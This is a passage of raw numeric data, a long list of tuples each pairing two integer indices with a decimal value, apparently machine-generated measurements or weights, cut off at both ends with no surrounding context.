0.84),(106,9555,0.84),(117,9555,0.84),(35,9556,0.91),(35,9557,0.0175),(106,9557,0.0175),(112,9557,0.0175),(117,9557,0.0175),(126,9557,0.0175),(134,9557,0.0175),(103,9557,0.035),(105,9557,0.035),(133,9557,0.0525),(120,9557,0.0875),(110,9557,0.1225),(35,9558,0.98),(35,9559,1.14331),(35,9565,0.37331),(35,9566,1.02669),(35,9567,1.23669),(35,9684,0.56),(35,9685,1.09669),(35,9686,1.23669),(35,9687,0.86331),(103,9687,0.86331),(105,9687,0.86331),(120,9687,0.86331),(134,9687,0.86331),(110,9687,2.58993),(35,9688,0.95669),(35,9689,0.32669),(120,9689,0.32669),(35,9690,0.93331),(35,9691,1.19),(35,9692,0.95669),(35,9693,1.09669),(35,9694,0.28),(35,9695,1.12),(35,9696,1.4),(35,9697,0.32669),(35,9698,0.95669),(35,9699,1.16669),(35,9700,1.26),(117,9700,2.22),(133,9700,2.64),(35,9701,1.09669),(35,9702,1.23669),(133,9703,1.16669),(35,9703,2.33338),(117,9703,6.16679),(35,9704,1.28331),(35,9705,1.30669),(35,9706,0.42),(35,9707,1.16669),(35,9708,1.26),(35,9709,0.37331),(120,9709,0.37331),(40,9709,2.34652),(133,9709,2.34652),(35,9710,1.07331),(35,9711,1.23669),(35,9712,0.37331),(35,9713,0.98),(35,9714,0.32669),(40,9714,0.32669),(133,9714,0.32669),(35,9715,1.02669),(35,9716,1.23669),(35,9717,0.95669),(110,9717,0.95669),(35,9718,1.05),(35,9719,1.49324),(35,9720,1.02669),(35,9721,1.09669),(35,9722,1.00331),(35,9723,1.09669),(35,9724,0.95669),(35,9725,1.05),(35,9726,1.00331),(35,9727,1.07331),(35,9728,1.16669),(35,9729,1.4),(40,10055,0.86331),(103,10055,0.86331),(105,10055,0.86331),(106,10055,0.86331),(112,10055,0.86331),(117,10055,0.86331),(120,10055,0.86331),(126,10055,0.86331),(104,10055,1.72662),(125,10055,1.72662),(110,10055,2.58993),(128,10055,2.58993),(113,10602,0.81669),(116,10602,0.81669),(126,10602,0.81669),(104,10602,1.63338),(120,10602,1.63338),(52,10607,0.02331),(104,10607,0.02331),(113,10607,0.02331),(118,10607,0.02331),(125,10607,0.02331),(112,10607,0.04662),(105,10607,0.06993),(106,10607,0.06993),(107,10607,0.06993),(119,10607,0.06993),(120,10607,0.06993),(126,10607,0.06993),(103,10607,0.11655),(117,10607,0.11655),(110,10607,0.18648),(123,10607,0.18648),(117,10621,0.18669),(125,10621,0.18669),(107,10621,0.37338),(110,10670,1.91338),(40,10822,1.96),(40,10823,1.14331),(40,10824,1.16669),(40,10825,0.56),(40,10826,1.05),(40,10827,1.28331),(40,10834,0.18669),(118,10834,0.18669),(103,10834,0.56007),(40,10835,0.88669),(40,10836,1.12),(40,10837,1.12),(40,10838,0.91),(40,10839,1.14331),(40,10840,1.21331),(40,10841,0.37331),(103,10841,0.37331),(40,10842,1.00331),(40,10843,1.09669),(40,10844,0.7),(40,10845,1.26),(40,10846,1.35331),(40,10847,0.81669),(40,10848,1.07331),(40,10849,0.93331),(40,10850,1.12),(40,10851,0.46669),(40,10852,1.05),(40,10853,1.14331),(40,10854,6.16679),(40,10855,0.37331),(119,10855,0.37331),(40,10856,0.95669),(119,10856,0.95669),(40,10857,1.14331),(40,10858,1.00331),(40,10859,0.88669),(40,10883,6.04321),(40,10884,7.27679),(40,10885,0.91),(40,10886,1.02669),(106,11489,0.28),(116,11489,0.28),(120,11489,0.28),(128,11489,0.28),(52,11489,0.56),(133,11489,0.84),(133,11540,0.14),(113,11540,0.74),(68,11540,1.3),(133,11541,0.95669),(68,11541,5.05679),(113,11541,5.05679),(52,11735,0.04669),(55,11735,0.04669),(58,11735,0.04669),(68,11735,0.04669),(110,11735,0.04669),(125,11735,0.04669),(128,11735,0.04669),(52,11738,0.32669),(55,11738,0.32669),(58,11738,0.32669),(68,11738,0.32669),(110,11738,0.32669),(120,11738,0.32669),(52,11742,0.04669),(58,11742,0.04669),(68,11742,0.04669),(110,11742,0.04669),(58,11745,0.51331),(58,11746,1.12),(58,11747,1.21331),(52,11760,0.04669),(58,11760,0.04669),(104,11760,0.09338),(109,11760,0.09338),(113,11760,0.09338),(126,11760,0.09338),(114,11760,0.18676),(121,11760,0.18676),(105,11760,0.28014),(117,11760,0.28014),(111,11760,0.32683),(125,11760,0.37352),(119,11760,0.4669),(103,11760,0.56028),(112,11760,0.65366),(52,11763,1.07331),(55,11763,1.07331),(52,12060,0.86331),(52,12064,0.42),(55,12064,0.42),(68,12064,0.42),(113,12064,0.42),(117,12064,0.42),(120,12064,0.42),(126,12064,0.42),(107,12064,0.84),(52,12166,0.98),(52,12167,1.05),(52,12168,1.14331),(52,12169,0.88669),(52,12170,1.05),(52,12171,0.88669),(52,12172,1.07331),(52,12173,1.09669),(52,12174,1.14331),(52,12175,0.28),(52,12176,1.00331),(52,12177,1.05),(52,12193,0.91),(52,12194,1.02669),(52,12195,0.51331),(52,12196,1.02669),(52,12197,1.21331),(52,12198,1.02669),(52,12199,1.21331),(52,12207,0.86331),(52,12208,1.00331),(52,12209,1.19),(55,12209,1.19),(52,12227,0.51331),(52,12228,1.07331),(52,12229,1.33),(52,12230,0.28),(128,12230,0.28),(52,12231,0.46669),(103,12231,0.46669),(52,12232,1.02669),(52,12233,1.16669),(55,12411,0.88669),(55,12412,1.05),(55,12413,0.32669),(103,12413,0.32669),(110,12413,0.32669),(120,12413,0.98007),(55,12414,1.00331),(55,12415,1.09669),(55,12416,1.07331),(55,12417,1.19),(55,12425,0.56),(55,12426,1.07331),(55,12427,1.35331),(55,12428,0.14),(55,12429,0.95669),(55,12430,1.14331),(55,12457,0.23331),(103,12457,0.23331),(120,12457,0.23331),(110,12457,0.46662),(55,12458,0.88669),(55,12459,1.14331),(58,12571,0.14),(58,12572,1.05),(58,12573,1.21331),(58,12595,0.81669),(58,12596,1.07331),(58,12597,0.14),(58,12598,1.02669),(58,12599,1.07331),(58,12600,0.42),(58,12601,1.00331),(58,12602,1.28331),(58,12603,0.56),(58,12604,1.14331),(58,12605,1.37669),(58,12611,0.86331),(58,12612,1.12),(58,12613,0.01169),(112,12613,0.01169),(113,12613,0.01169),(116,12613,0.01169),(118,12613,0.01169),(104,12613,0.02338),(120,12613,0.03507),(110,12613,0.04676),(103,12613,0.05845),(58,12614,1.05),(58,12615,1.09669),(58,12616,0.84),(58,12617,0.95669),(58,12618,1.07331),(58,12619,0.95669),(58,12620,1.07331),(58,12621,4.33355),(58,12622,0.98),(58,12623,1.07331),(58,12624,0.98),(58,12625,1.07331),(58,12626,0.98),(58,12627,1.12),(58,12628,1.05),(58,12629,1.23669),(58,12630,5.55),(58,12631,0.14),(58,12632,1.02669),(58,12633,1.07331),(68,13486,0.86331),(68,13487,0.95669),(68,13488,0.86331),(68,13489,1.05),(68,13490,0.37331),(68,13491,0.93331),(68,13492,1.02669),(68,13493,0.37331),(68,13494,1.12),(68,13495,1.21331),(68,13496,1.09669),(68,13497,1.19),(68,13498,0.37331),(68,13499,1.00331),(68,13500,1.09669),(68,13524,0.81669),(68,13525,1.02669),(68,13526,0.46669),(68,13527,1.21331),(68,13528,1.37669),(68,13529,0.18669),(68,13530,0.95669),(68,13531,1.12),(68,13532,0.23331),(68,13533,0.91),(68,13534,1.02669),(68,13535,1.00331),(68,13536,1.16669),(104,13547,0.32669),(120,13547,0.32669),(68,13547,1.72679),(113,13547,1.72679),(68,13548,5.42679),(113,13548,5.42679),(68,13549,6.53679),(113,13549,6.53679),(68,13550,0.23331),(113,13550,0.23331),(68,13551,0.93331),(68,13552,0.98),(68,13553,0.02331),(106,13553,0.02331),(113,13553,0.02331),(123,13553,0.02331),(126,13553,0.02331),(103,13553,0.04662),(120,13553,0.04662),(112,13553,0.06993),(117,13553,0.09324),(68,13554,0.88669),(68,13555,1.07331),(68,13556,3.73324),(68,13557,1.05),(68,13558,1.00331),(68,13559,1.00331),(68,13560,1.00331),(68,13561,0.93331),(68,13562,0.98),(68,13563,0.93331),(68,13564,1.00331),(68,13565,0.91),(68,13595,0.32669),(105,13595,0.32669),(68,13596,1.00331),(68,13597,1.14331),(68,13598,0.37331),(68,13599,0.93331),(68,13600,1.02669),(117,13601,0.28),(123,13601,0.28),(68,13601,1.48),(113,13601,1.48),(68,13602,5.55),(113,13602,5.55),(68,13603,6.66),(113,13603,6.66),(68,13706,5.30321),(77,13747,0.18669),(77,13748,2.4666),(109,13975,0.14),(117,13975,0.14),(118,13975,0.14),(110,13975,0.42),(117,13976,0.84),(118,13976,0.84),(110,13976,2.52),(105,14016,0.18669),(104,14034,0.18669),(110,14034,0.37338),(103,14034,0.56007),(105,14188,0.23331),(110,14188,0.23331),(113,14188,0.23331),(116,14188,0.23331),(125,14188,0.23331),(107,14188,0.93324),(113,14199,0.46669),(113,14460,0.42),(133,14460,0.42),(110,14470,1.02662),(133,14470,1.02662),(106,14507,0.86331),(133,14507,0.86331),(113,14507,1.72662),(110,14507,4.31655),(105,14509,0.18669),(126,14509,0.18669),(133,14509,0.18669),(104,14509,0.37338),(120,14535,0.32669),(133,14535,0.32669),(110,15594,0.37331),(103,15646,0.51331),(110,15646,0.51331),(120,15646,0.51331),(134,15646,0.51331),(110,15668,0.04669),(104,15718,0.04669),(103,15726,0.32669),(110,15726,0.65338),(104,15727,0.32669),(112,15727,0.32669),(109,15834,0.07),(111,15834,0.07),(126,15834,0.07),(128,15834,0.07),(104,15834,0.14),(106,15834,0.2),(103,16413,0.23331),(120,16413,0.23331),(103,16414,0.95669),(103,16415,1.05),(103,16416,0.14),(105,16416,0.14),(107,16416,0.14),(110,16416,0.14),(116,16416,0.14),(125,16416,0.14),(106,16416,0.28),(120,16416,0.56),(103,16417,0.91),(103,16418,0.95669),(103,16419,0.18669),(120,16419,0.18669),(103,16420,0.91),(120,16420,0.91),(103,16421,1.07331),(103,16422,0.28),(103,16423,0.95669),(103,16424,1.14331),(103,16425,0.32669),(103,16426,0.95669),(103,16427,1.05),(103,16428,0.23331),(103,16429,0.93331),(103,16430,1.05),(103,16431,0.56),(103,16432,1.28331),(103,16433,1.35331),(103,16434,0.23331),(103,16435,0.88669),(103,16436,1.09669),(103,16437,0.65338),(103,16438,1.05),(103,16439,1.19),(103,16440,0.93331),(103,16441,1.09669),(103,16442,0.37331),(103,16443,1.02669),(103,16444,1.14331),(103,16445,0.42),(103,16446,0.98),(103,16447,1.14331),(103,16448,0.95669),(103,16449,1.07331),(104,16450,0.14),(117,16450,0.14),(119,16450,0.14),(120,16450,0.14),(103,16450,0.28),(103,16451,0.86331),(104,16451,0.86331),(119,16451,0.86331),(103,16452,0.98),(103,16453,0.86331),(103,16454,1.12),(103,16455,0.28),(120,16455,0.28),(103,16456,0.95669),(103,16457,1.19),(103,16458,0.18669),(103,16459,0.91),(103,16460,1.12),(103,16461,0.18669),(103,16462,1.02669),(103,16463,1.21331),(103,16464,0.32669),(128,16464,0.32669),(103,16465,0.98),(103,16466,1.12),(111,16467,0.09331),(112,16467,0.09331),(117,16467,0.09331),(118,16467,0.09331),(119,16467,0.09331),(126,16467,0.09331),(105,16467,0.18662),(120,16467,0.18662),(110,16467,0.27993),(103,16467,0.37324),(125,16467,0.37324),(103,16468,0.79331),(105,16468,1.58662),(103,16469,0.88669),(103,16470,0.81669),(103,16471,0.88669),(103,16472,0.86331),(103,16473,1.00331),(103,16474,0.91),(103,16475,0.98),(103,16476,0.42),(103,16477,1.07331),(103,16478,1.19),(103,16479,0.32669),(117,16479,0.32669),(103,16480,0.91),(103,16481,1.12),(123,16482,0.23331),(125,16482,0.46662),(103,16482,1.16655),(103,16483,0.95669),(103,16484,1.09669),(103,16485,0.98),(103,16486,1.07331),(103,16487,1.00331),(103,16488,1.26),(103,16489,0.93331),(103,16490,1.07331),(103,16491,0.93331),(103,16492,1.00331),(105,16493,0.18669),(128,16493,0.18669),(117,16493,0.37338),(119,16493,0.37338),(103,16493,0.56007),(103,16494,0.88669),(103,16495,1.02669),(103,16496,0.86331),(103,16497,1.05),(103,16498,0.98),(103,16499,1.05),(103,16500,0.37331),(110,16500,0.37331),(103,16501,0.98),(103,16502,1.07331),(103,16553,0.18669),(103,16554,0.88669),(103,16555,0.98),(103,16556,0.28),(105,16556,0.28),(120,16556,0.28),(110,16556,0.84),(103,16557,1.00331),(103,16558,1.12),(103,16559,0.95669),(103,16560,1.02669),(103,16561,0.86331),(103,16562,1.02669),(103,16563,0.88669),(103,16564,1.09669),(103,16565,0.37331),(103,16566,0.98),(103,16567,1.07331),(103,16568,0.37331),(103,16569,1.07331),(103,16570,1.35331),(103,16571,0.18669),(106,16571,0.18669),(116,16571,0.18669),(125,16571,0.18669),(112,16571,0.37338),(103,16572,0.86331),(103,16573,0.91),(103,16574,0.18669),(103,16575,0.86331),(103,16576,0.95669),(103,16577,0.14),(126,16577,0.14),(119,16577,0.28),(103,16578,0.91),(103,16579,1.02669),(103,16580,0.32669),(119,16580,0.32669),(103,16581,0.95669),(103,16582,1.00331),(107,16583,0.18669),(125,16583,0.37338),(103,16583,0.56007),(103,16584,0.88669),(107,16584,0.88669),(103,16585,0.98),(103,16586,0.91),(103,16587,1.00331),(103,16588,0.91),(103,16589,1.00331),(103,16590,0.60669),(103,16591,1.09669),(103,16592,1.28331),(103,16593,0.18669),(103,16594,0.91),(103,16595,1.00331),(103,16596,0.28),(103,16597,1.00331),(103,16598,1.14331),(103,16599,0.65338),(103,16600,1.05),(103,16601,1.19),(103,16602,0.95669),(103,16603,1.05),(103,16604,0.18669),(103,16605,0.86331),(103,16606,0.91),(103,16607,0.28),(103,16608,0.95669),(103,16609,1.19),(103,16610,1.00331),(103,16611,1.14331),(103,16612,0.84),(112,16612,0.84),(103,16613,1.05),(103,16614,0.93331),(103,16615,1.12),(103,16616,0.98),(103,16617,0.91),(103,16618,0.98),(103,16619,0.91),(103,16620,1.09669),(103,16621,1.77338),(103,16622,1.07331),(103,16623,1.09669),(103,16624,0.18669),(120,16624,0.18669),(123,16624,0.18669),(119,16624,0.56007),(103,16625,1.00331),(103,16626,1.07331),(103,16627,0.98),(103,16628,1.26),(103,16629,0.14),(103,16630,0.91),(103,16631,1.09669),(103,16632,0.88669),(103,16633,0.95669),(103,16634,0.98),(103,16635,1.12),(103,16636,1.00331),(103,16637,1.05),(103,16638,1.02669),(103,16639,1.09669),(103,16640,0.91),(103,16641,1.00331),(103,16642,1.00331),(103,16643,1.07331),(103,16644,1.16669),(103,16645,1.26),(103,16646,0.98),(103,16647,1.07331),(103,16648,0.95669),(103,16649,1.07331),(103,16650,0.51331),(103,16651,1.00331),(103,16652,1.07331),(103,16739,0.93331),(103,16740,1.02669),(103,16741,0.79331),(103,16742,0.95669),(103,16743,0.91),(103,16744,0.95669),(125,16745,0.86331),(103,16745,1.72662),(103,16746,1.05),(103,16747,0.98),(103,16748,0.93331),(103,16749,1.05),(103,16750,0.84),(103,16751,0.93331),(103,16752,0.91),(112,16752,0.91),(103,16753,1.00331),(103,16754,0.88669),(103,16755,1.00331),(103,16756,0.86331),(105,16756,0.86331),(119,16756,0.86331),(112,16756,1.72662),(103,16757,0.95669),(103,16758,0.81669),(117,16758,0.81669),(105,16758,1.63338),(112,16758,1.63338),(119,16758,3.26676),(103,16759,1.05),(103,16760,0.88669),(125,16760,0.88669),(103,16761,1.00331),(103,16762,0.14),(103,16763,0.93331),(103,16764,1.05),(125,16765,0.18669),(103,16765,0.37338),(103,16766,0.95669),(103,16767,1.05),(103,16768,0.95669),(103,16769,1.02669),(103,16770,0.42),(103,16771,1.02669),(103,16772,1.16669),(103,16773,0.28),(103,16774,0.98),(103,16775,1.07331),(103,16776,0.51331),(103,16777,1.12),(103,16778,1.23669),(103,16779,0.88669),(103,16780,1.05),(103,16781,0.86331),(103,16782,0.95669),(120,16783,0.84),(103,16783,1.68),(103,16784,1.91338),(103,16785,0.84),(113,16785,0.84),(116,16785,0.84),(118,16785,0.84),(103,16786,1.00331),(103,16787,0.84),(110,16787,2.52),(103,16788,0.98),(103,16789,0.91),(103,16790,1.07331),(103,16791,0.91),(103,16792,1.07331),(103,16793,0.91),(103,16794,0.88669),(103,16795,0.95669),(103,16796,0.93331),(103,16797,0.98),(103,16798,0.86331),(117,16798,0.86331),(125,16798,0.86331),(103,16799,1.07331),(103,16800,0.86331),(117,16800,0.86331),(119,16800,0.86331),(123,16800,0.86331),(103,16801,0.91),(103,16802,1.12),(103,16803,1.07331),(103,16804,1.19),(103,16805,1.07331),(103,16806,1.4),(103,16807,1.05),(103,16808,1.16669),(103,16809,0.37331),(110,16809,0.37331),(119,16809,0.37331),(126,16809,0.74662),(103,16810,0.93331),(103,16811,1.02669),(103,16812,0.28),(103,16813,0.91),(103,16814,0.98),(103,16815,0.42),(103,16816,1.02669),(103,16817,1.19),(103,16818,0.32669),(120,16818,0.32669),(103,16819,0.93331),(103,16820,1.02669),(103,16821,1.00331),(103,16822,1.09669),(103,16823,0.98),(103,16824,1.12),(103,16825,0.86331),(103,16826,1.05),(103,16827,0.88669),(103,16828,0.98),(120,16829,0.18669),(103,16829,1.8669),(103,16830,0.88669),(103,16831,0.95669),(103,16832,0.88669),(103,16833,1.05),(103,16834,4.31655),(103,16835,1.00331),(103,16836,1.02669),(103,16837,0.93331),(103,16838,0.95669),(103,16839,0.98),(103,16840,0.95669),(103,16841,1.16669),(103,16842,0.91),(103,16843,0.95669),(103,16844,0.91),(103,16845,1.00331),(103,16846,0.56),(103,16847,1.02669),(103,16848,1.19),(103,16849,1.12),(103,16850,1.30669),(103,16851,0.56),(120,16851,0.84),(103,16852,0.93331),(103,16853,0.98),(103,16854,0.95669),(103,16855,1.05),(103,16856,0.37331),(103,16857,1.07331),(103,16858,1.35331),(103,16859,0.18669),(120,16859,0.18669),(103,16860,0.93331),(103,16861,1.00331),(103,16862,0.84),(103,16863,0.91),(103,16864,0.81669),(103,16865,0.93331),(103,16866,0.88669),(103,16867,0.95669),(103,16868,0.93331),(103,16869,1.09669),(103,16870,0.95669),(103,16871,1.05),(103,16872,0.93331),(103,16873,1.02669),(103,16874,1.05),(103,16875,1.14331),(103,16876,0.93331),(103,16877,1.00331),(103,16878,0.93331),(103,16879,1.00331),(103,16880,0.91),(103,16881,1.00331),(103,16882,0.84),(106,16882,0.84),(113,16882,0.84),(117,16882,0.84),(110,16882,2.52),(103,16883,0.95669),(103,16884,1.63338),(103,16885,1.86662),(103,16886,0.84),(106,16886,0.84),(110,16886,0.84),(112,16886,0.84),(118,16886,0.84),(120,16886,0.84),(126,16886,0.84),(105,16886,1.68),(107,16886,1.68),(123,16886,1.68),(103,16887,1.07331),(103,16888,0.86331),(103,16889,0.95669),(103,16890,0.86331),(103,16891,0.95669),(103,16892,0.95669),(103,16893,0.79331),(119,16893,0.79331),(103,16894,0.98),(103,16895,0.84),(103,16896,0.93331),(103,16897,0.91),(112,16897,0.91),(103,16898,0.98),(103,16899,0.91),(103,16900,1.02669),(103,16901,0.98),(105,16902,0.84),(120,16902,0.84),(103,16902,1.68),(104,16902,1.68),(112,16902,1.68),(117,16902,1.68),(103,16903,0.88669),(112,16903,0.88669),(103,16904,0.95669),(103,16905,0.88669),(103,16906,1.00331),(104,16907,0.18669),(105,16907,0.18669),(106,16907,0.18669),(123,16907,0.18669),(112,16907,0.37338),(125,16907,0.37338),(103,16907,0.93345),(103,16908,0.84),(112,16908,0.84),(103,16909,0.95669),(103,16910,0.95669),(103,16911,1.07331),(103,16912,0.91),(103,16913,1.14331),(103,16914,0.88669),(103,16915,1.07331),(103,16916,0.91),(103,16917,0.98),(103,16918,0.95669),(103,16919,1.02669),(103,16920,0.95669),(103,16921,1.07331),(103,16922,0.28),(120,16922,0.28),(126,16922,0.28),(103,16923,0.93331),(103,16924,1.02669),(103,16925,0.23331),(103,16926,0.95669),(103,16927,1.05),(103,16945,0.37331),(103,16946,0.95669),(103,16947,1.00331),(103,16948,0.23331),(103,16949,0.88669),(103,16950,1.09669),(103,17322,0.18669),(103,17323,0.88669),(103,17324,1.02669),(103,17325,2.5334),(103,17326,0.91),(103,17327,1.05),(103,17328,0.88669),(103,17329,0.93331),(103,17330,1.00331),(103,17331,1.21331),(103,17332,1.86662),(103,17333,1.02669),(103,17334,1.09669),(103,17335,0.65338),(118,17335,0.65338),(119,17335,0.65338),(126,17335,0.65338),(107,17335,1.30676),(103,17336,1.09669),(107,17336,1.09669),(118,17336,1.09669),(119,17336,1.09669),(126,17336,1.09669),(103,17337,1.26),(118,17337,1.26),(103,17338,0.95669),(103,17339,1.02669),(103,17340,0.91),(110,17340,0.91),(103,17341,0.46669),(104,17341,0.46669),(110,17341,0.46669),(113,17341,0.46669),(120,17341,0.93338),(103,17342,1.05),(103,17343,1.12),(103,17344,0.46662),(103,17345,0.93331),(103,17346,1.00331),(103,17347,0.98),(103,17348,1.05),(103,17349,0.28),(103,17350,1.12),(103,17351,1.21331),(110,17352,0.14),(112,17352,0.14),(119,17352,0.14),(103,17352,0.28),(103,17353,0.86331),(103,17354,1.00331),(103,17355,0.95669),(103,17356,1.19),(103,17357,0.18662),(120,17357,0.27993),(103,17358,0.88669),(103,17359,0.98),(103,17360,0.84),(103,17361,0.98),(103,17362,0.14),(106,17362,0.14),(121,17362,0.14),(123,17362,0.14),(110,17362,0.42),(114,17362,0.42),(128,17362,0.56),(111,17362,0.7),(103,17363,0.93331),(103,17364,1.09669),(103,17365,0.37331),(110,17365,0.37331),(111,17365,0.37331),(103,17366,1.12),(103,17367,1.21331),(103,17368,0.88669),(103,17369,0.98),(103,17370,0.28),(110,17370,0.28),(103,17371,0.93331),(103,17372,1.02669),(103,17373,0.37331),(103,17374,1.09669),(103,17375,1.16669),(103,17376,0.18669),(106,17376,0.18669),(110,17376,0.18669),(116,17376,0.18669),(103,17377,0.86331),(103,17378,0.95669),(103,17379,0.23331),(103,17380,0.88669),(103,17381,1.07331),(103,17382,0.32669),(103,17383,0.93331),(103,17384,1.07331),(103,17385,0.23331),(103,17386,0.91),(103,17387,1.00331),(103,17388,0.18669),(103,17389,0.86331),(103,17390,0.98),(103,17391,0.32669),(114,17391,0.32669),(106,17391,0.65338),(103,17392,1.05),(103,17393,1.16669),(104,17394,0.37331),(103,17394,0.74662),(103,17395,1.19),(103,17396,1.4),(103,17397,0.95669),(103,17398,1.05),(103,17399,0.32669),(103,17400,1.12),(103,17401,1.23669),(103,17402,0.37331),(103,17403,0.95669),(103,17404,1.02669),(103,17405,0.23331),(103,17406,0.98),(103,17407,1.09669),(103,17408,0.42),(110,17408,2.52),(103,17409,1.00331),(103,17410,1.09669),(103,17411,0.14),(103,17412,1.00331),(103,17413,1.12),(103,17414,0.42),(123,17414,0.42),(103,17415,1.02669),(103,17416,1.26),(103,17417,0.23331),(105,17417,0.23331),(103,17418,0.95669),(103,17419,1.07331),(103,17420,0.28),(117,17420,0.28),(103,17421,0.98),(103,17422,1.07331),(103,17423,0.28),(103,17424,1.02669),(103,17425,1.12),(103,17426,0.98),(103,17427,1.09669),(103,17428,0.51331),(103,17429,1.12),(103,17430,1.23669),(103,17431,0.42),(110,17431,0.42),(103,17432,1.16669),(103,17433,1.28331),(103,17434,0.93338),(103,17435,1.09669),(103,17436,1.19),(103,17437,1.05),(103,17438,1.16669),(109,17439,0.14),(111,17439,0.14),(114,17439,0.14),(116,17439,0.14),(117,17439,0.14),(120,17439,0.14),(103,17439,0.28),(103,17440,0.91),(103,17441,1.00331),(103,17442,0.91),(103,17443,1.02669),(104,18263,0.79331),(104,18264,0.91),(104,18265,0.79331),(104,18266,0.91),(126,18460,0.18669),(119,18460,0.37338),(104,18460,0.56007),(110,18460,0.56007),(104,18461,0.93331),(104,18462,1.02669),(104,18463,0.91),(104,18464,1.07331),(104,18465,0.86331),(104,18466,1.00331),(104,18467,0.32669),(110,18467,0.32669),(104,18468,0.93331),(104,18469,1.05),(104,18470,0.42),(104,18471,1.09669),(104,18472,1.16669),(104,18473,0.32669),(104,18474,0.98),(104,18475,1.09669),(104,18476,0.46669),(104,18477,1.12),(104,18478,1.37669),(104,18479,0.95669),(104,18480,0.56661),(104,18481,0.93324),(104,18482,0.91),(104,18483,1.09669),(104,18484,0.93331),(104,18485,1.02669),(104,18486,0.88669),(104,18487,1.02669),(104,18488,0.95669),(104,18489,1.05),(104,18490,0.37331),(104,18491,0.93331),(104,18492,1.19),(104,18493,0.23331),(104,18494,0.98),(104,18495,1.07331),(104,18509,0.28),(104,18510,0.95669),(104,18511,1.05),(104,18512,0.18669),(106,18512,0.18669),(112,18512,0.18669),(123,18512,0.18669),(104,18513,0.86331),(104,18514,1.02669),(104,18515,0.23331),(104,18516,0.93331),(104,18517,1.09669),(104,18518,0.28),(104,18519,0.95669),(104,18520,1.14331),(104,18521,0.88669),(104,18522,0.95669),(104,18523,1.02669),(104,18524,0.98),(104,18525,1.07331),(104,18526,0.93331),(126,18526,0.93331),(104,18527,1.05),(126,18527,1.05),(104,18528,0.18669),(107,18528,0.18669),(110,18528,0.18669),(119,18528,0.18669),(104,18529,0.91),(104,18530,0.98),(104,18531,1.09669),(104,18532,0.98),(104,18533,0.95669),(104,18534,1.16669),(104,18535,1.02669),(104,18536,1.21331),(104,18537,0.91),(104,18538,1.00331),(104,18539,0.93331),(104,18540,0.98),(104,18541,0.18669),(110,18541,0.37338),(104,18542,0.88669),(110,18542,0.88669),(104,18543,1.02669),(104,18544,0.28),(104,18545,1.00331),(104,18546,1.12),(104,18547,0.91),(104,18548,1.02669),(104,18549,0.86331),(104,18550,0.98),(104,18551,0.14),(112,18551,0.14),(104,18552,0.95669),(104,18553,1.09669),(104,18554,0.23331),(104,18555,1.05),(104,18556,1.19),(104,18557,0.28),(107,18557,0.56),(126,18557,0.56),(104,18558,0.91),(104,18559,1.00331),(104,18560,0.88669),(104,18561,0.95669),(104,18562,0.91),(104,18563,1.05),(104,18564,0.28),(104,18565,0.91),(104,18566,1.00331),(104,18652,0.91),(104,18653,0.98),(104,18654,0.84),(105,18654,0.84),(126,18654,0.84),(104,18655,0.93331),(104,18656,0.86331),(104,18657,1.00331),(104,18658,0.86331),(104,18659,0.95669),(104,18660,0.23331),(110,18660,0.23331),(104,18661,0.88669),(104,18662,1.00331),(104,18663,0.86331),(104,18664,0.95669),(104,18665,0.86331),(104,18666,0.98),(104,18667,0.81669),(104,18668,0.93331),(104,18669,0.84),(118,18669,0.84),(104,18670,0.95669),(118,18670,0.95669),(104,18671,0.93331),(104,18672,1.00331),(104,18673,0.93331),(104,18674,1.07331),(104,18675,1.96),(104,18676,0.93331),(104,18677,0.93331),(104,18678,1.02669),(104,18679,1.00331),(104,18680,1.12),(104,18681,0.98),(104,18682,0.91),(104,18683,1.00331),(104,18684,0.81669),(125,18684,0.81669),(107,18684,1.63338),(104,18685,0.98),(104,18686,0.98),(113,18686,0.98),(104,18687,1.12),(104,18688,0.93331),(104,18689,1.14331),(104,18690,0.91),(104,18691,1.00331),(104,18692,0.91),(104,18693,1.02669),(104,18711,0.28),(104,18712,0.91),(104,18713,1.09669),(125,18714,0.23331),(104,18714,0.46662),(104,18715,0.93331),(104,18716,1.00331),(104,18717,0.91),(104,18718,1.00331),(104,18882,0.79331),(104,18883,0.88669),(104,18884,2.4666),(104,18885,0.18669),(123,18885,0.37338),(104,18886,0.98),(104,18887,1.02669),(104,18888,1.09669),(104,18889,1.14331),(104,18890,0.42),(113,18890,0.42),(104,18891,1.05),(104,18892,1.12),(104,18893,0.37331),(110,18893,0.37331),(104,18894,0.95669),(104,18895,1.05),(104,18896,0.46662),(104,18897,0.91),(104,18898,1.02669),(104,18899,0.88669),(104,18900,0.98),(104,18901,0.23331),(104,18902,0.91),(104,18903,1.05),(104,18904,0.32669),(104,18905,1.12),(104,18906,1.23669),(104,18907,0.18669),(110,18907,0.18669),(104,18908,0.91),(104,18909,1.05),(104,18910,0.18669),(106,18910,0.18669),(109,18910,0.18669),(111,18910,0.18669),(117,18910,0.37338),(121,18910,0.56007),(114,18910,0.74676),(128,18910,6.72084),(113,18910,11.5748),(104,18911,0.93331),(111,18911,0.93331),(117,18911,0.93331),(114,18911,1.86662),(121,18911,1.86662),(128,18911,13.9997),(113,18911,30.7992),(104,18912,1.09669),(111,18912,1.09669),(117,18912,1.09669),(114,18912,2.19338),(121,18912,2.19338),(128,18912,16.4503),(113,18912,36.1908),(104,18913,1.00331),(104,18914,1.14331),(104,18915,0.37331),(113,18915,0.37331),(117,18915,0.37331),(104,18916,1.02669),(104,18917,1.09669),(104,18918,0.56),(104,18919,1.16669),(104,18920,1.33),(104,18921,0.28),(104,18922,1.12),(104,18923,1.33),(104,18924,0.37331),(104,18925,0.93331),(104,18926,1.00331),(104,18927,0.93331),(104,18928,1.02669),(104,18929,0.46669),(104,18930,1.12),(104,18931,1.26),(104,18932,0.84),(104,18933,0.95669),(104,18934,1.05),(104,18935,0.91),(104,18936,0.95669),(104,18937,0.95669),(104,18938,1.21331),(105,19363,0.21),(105,19364,0.91),(105,19365,1.12),(105,19690,0.84),(105,19691,1.09669),(105,19692,0.32669),(105,19693,0.98),(105,19694,1.05),(105,19695,1.96),(105,19696,0.95669),(105,19697,1.09669),(105,19698,1.05),(105,19699,1.09669),(105,19700,0.93331),(105,19701,1.00331),(105,19702,0.95669),(105,19703,1.02669),(105,19704,1.00331),(105,19705,1.19),(105,19706,0.98),(105,19707,1.09669),(105,19708,1.00331),(105,19709,1.16669),(105,19710,0.46669),(105,19711,1.02669),(105,19712,1.12),(105,19713,0.23331),(105,19714,0.88669),(105,19715,0.98),(105,19716,0.28),(105,19717,0.95669),(105,19718,1.23669),(105,19719,0.84),(105,19720,0.95669),(105,19721,1.16669),(105,19722,1.00331),(105,19723,1.19),(105,19724,0.98),(105,19725,1.14331),(105,19726,0.42),(